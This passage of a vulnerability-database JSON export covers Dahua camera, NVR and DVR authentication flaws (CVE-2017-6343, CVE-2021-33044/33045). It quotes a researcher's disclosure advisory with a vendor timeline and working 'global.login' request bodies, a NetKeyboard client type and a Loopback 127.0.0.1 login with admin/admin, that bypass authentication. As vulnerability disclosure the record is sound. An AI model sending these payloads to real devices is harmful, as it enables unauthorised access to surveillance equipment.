"db": "BID",
"id": "96449"
},
{
"db": "VULHUB",
"id": "VHN-114546"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6343",
"trust": 3.4
},
{
"db": "BID",
"id": "96449",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-02551",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-114546",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "VULHUB",
"id": "VHN-114546"
},
{
"db": "BID",
"id": "96449"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"id": "VAR-201702-1057",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "VULHUB",
"id": "VHN-114546"
}
],
"trust": 1.60625
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
}
]
},
"last_update_date": "2023-12-18T12:20:02.310000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HCVR7204/7208/7216A-S3",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114546"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/96449"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6343"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6343"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "VULHUB",
"id": "VHN-114546"
},
{
"db": "BID",
"id": "96449"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "VULHUB",
"id": "VHN-114546"
},
{
"db": "BID",
"id": "96449"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"date": "2017-02-27T00:00:00",
"db": "VULHUB",
"id": "VHN-114546"
},
{
"date": "2017-02-24T00:00:00",
"db": "BID",
"id": "96449"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"date": "2017-02-27T07:59:00.440000",
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"date": "2017-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114546"
},
{
"date": "2017-03-07T01:07:00",
"db": "BID",
"id": "96449"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DHI-HCVR7216A-S3 Vulnerability to gain login access on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
],
"trust": 0.6
}
}
VAR-202109-1874
Vulnerability from variot - Updated: 2023-12-18 12:16The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }
Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }
[ETX]
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1874",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hum7xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "xvr-5x16",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "vto-75x95x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000003.0.r.210714"
},
{
"model": "ipc-hx5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "vth-542xh",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.500.0000002.0.r.210715"
},
{
"model": "xvr-4x04",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210709"
},
{
"model": "vto-65xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000004.0.r.210715"
},
{
"model": "xvr-5x08",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-4x08",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210709"
},
{
"model": "nvr-6xx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210716"
},
{
"model": "ipc-hx3xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.800.0000000.29.r.210630"
},
{
"model": "nvr-5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000000.0.r.210710"
},
{
"model": "xvr-7x32",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-7x16",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "nvr-2xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000000.1.r.210710"
},
{
"model": "xvr-5x04",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-4x04",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "nvr-4xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000005.1.r.210713"
},
{
"model": "nvr-1xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000005.1.r.210709"
},
{
"model": "vth-542xh",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto-65xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-4xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-6xx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "hx5xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "hum7xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "vto75x95x versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "vto65xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "vth542xh versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr1xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr2xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr5xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr6xx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr4xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr5xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr7xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.800.0000000.29.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-1xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000005.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-2xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000000.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-4xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000005.1.r.210713",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000000.0.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-6xx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210716",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-6xx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.500.0000002.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000004.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000003.0.r.210714",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x08_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x08:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x04_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x08_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x08:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x16_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x16:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x16_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x16:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x32_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x32:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bashis",
"sources": [
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 0.1
},
"cve": "CVE-2021-33045",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
